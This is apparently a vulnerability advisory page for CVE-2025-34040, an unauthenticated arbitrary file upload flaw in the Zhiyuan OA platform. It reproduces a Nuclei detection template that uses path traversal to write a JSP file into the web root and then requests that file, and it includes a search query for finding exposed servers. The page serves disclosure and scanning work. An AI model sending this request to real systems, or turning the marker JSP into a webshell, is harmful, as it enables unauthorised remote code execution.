CVE-2025-34040: Zhiyuan OA Platform - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: Zhiyuan OA Platform | POC: 已公开

漏洞描述

An arbitrary file upload vulnerability exists in the Zhiyuan OA platform 5.0, 5.1 - 5.6sp1, 6.0 - 6.1sp2, 7.0, 7.0sp1 - 7.1, 7.1sp1, and 8.0 - 8.0sp2 via the wpsAssistServlet interface. The realFileType and fileId parameters are improperly validated during multipart file uploads, allowing unauthenticated attackers to upload crafted JSP files outside of intended directories using path traversal. Successful exploitation enables remote code execution as the uploaded file can be accessed and executed through the web server.

PoC代码[已公开]

id: CVE-2025-34040

info:
  name: Zhiyuan OA Platform - Arbitrary File Upload
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An arbitrary file upload vulnerability exists in the Zhiyuan OA platform 5.0, 5.1 - 5.6sp1, 6.0 - 6.1sp2, 7.0, 7.0sp1 - 7.1, 7.1sp1, and 8.0 - 8.0sp2 via the wpsAssistServlet interface. The realFileType and fileId parameters are improperly validated during multipart file uploads, allowing unauthenticated attackers to upload crafted JSP files outside of intended directories using path traversal. Successful exploitation enables remote code execution as the uploaded file can be accessed and executed through the web server.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2025-34040
    - https://www.cnblogs.com/pursue-security/p/17677130.html
  classification:
    epss-score: 0.09888
    epss-percentile: 0.92725
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="seeyon/index.jsp"
  tags: cve,cve2025,file-upload,intrusive,zhiyuan,lfi,vkev

variables:
  marker: "{{randstr}}"
  filename: "{{randbase(8)}}"

http:
  - raw:
      - |
        POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{filename}}.jsp&fileId=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
        Accept-Encoding: gzip

        --59229605f98b8cf290a7b8908b34616b
        Content-Disposition: form-data; name="upload"; filename="123.xls"
        Content-Type: application/vnd.ms-excel

        <%@ page import="java.util.Base64" %><%= new String(Base64.getDecoder().decode("{{base64(marker)}}"), "UTF-8") %>
        --59229605f98b8cf290a7b8908b34616b--

    matchers:
      - type: word
        part: body
        words:
          - "officeTransResultFlag"
          - '"success":true'
        condition: and
        internal: true

  - raw:
      - |
        GET /{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "{{marker}}"
# digest: 4a0a00473045022100fb9c105b77bfa6cf3a69135fb57f6af42a112282923ccb66a0ec9fc2ff046dda02202e2e27244f1053abe1068be953dc8a5573da7db000fbc73c18f4c8e47fdb6f7a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-34040.yaml